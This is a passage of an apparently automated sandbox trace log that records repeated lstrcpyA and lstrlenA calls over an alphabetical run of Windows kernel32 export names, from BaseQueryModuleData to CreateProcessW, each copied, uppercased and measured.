lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.726] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.726] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.726] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.726] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.726] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.726] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.726] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.726] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.726] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.726] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.726] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.726] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.726] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.726] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.726] lstrlenA (lpString="BEEP") returned 4 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.726] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.726] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.726] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.726] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.727] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.727] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.727] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.727] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.727] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.727] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.727] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.727] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.727] lstrlenA (lpString="CANCELIO") returned 8 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.727] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.727] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.727] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.727] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.727] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.727] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.727] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.727] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.727] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.727] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.727] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.728] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.728] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.728] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.728] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.728] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.728] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.728] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.728] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.728] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.728] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.728] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.728] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.728] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.728] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.728] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.728] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.728] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.728] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.728] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.729] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.729] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.729] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.729] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.729] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.729] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.729] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.729] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.729] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.729] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.729] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.729] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.729] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.729] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.729] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.729] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.729] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.729] lstrlenA (lpString="COPYFILEA") returned 9 [0083.729] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.729] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.730] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.730] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.730] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.730] lstrlenA (lpString="COPYFILEW") returned 9 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.730] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.730] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.730] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.730] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.730] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.730] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.730] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.730] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.730] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.730] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.730] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.730] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.730] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.730] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.730] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.731] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.731] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.731] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.731] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.731] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.731] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.731] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.731] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.731] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.731] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.731] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.731] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.731] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.731] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.731] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.731] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.731] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.731] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.731] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.731] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.732] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.732] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.732] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.732] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.732] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.732] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.732] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.732] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.732] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.732] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.732] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.732] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.732] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.732] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.732] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.732] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.732] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.732] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | 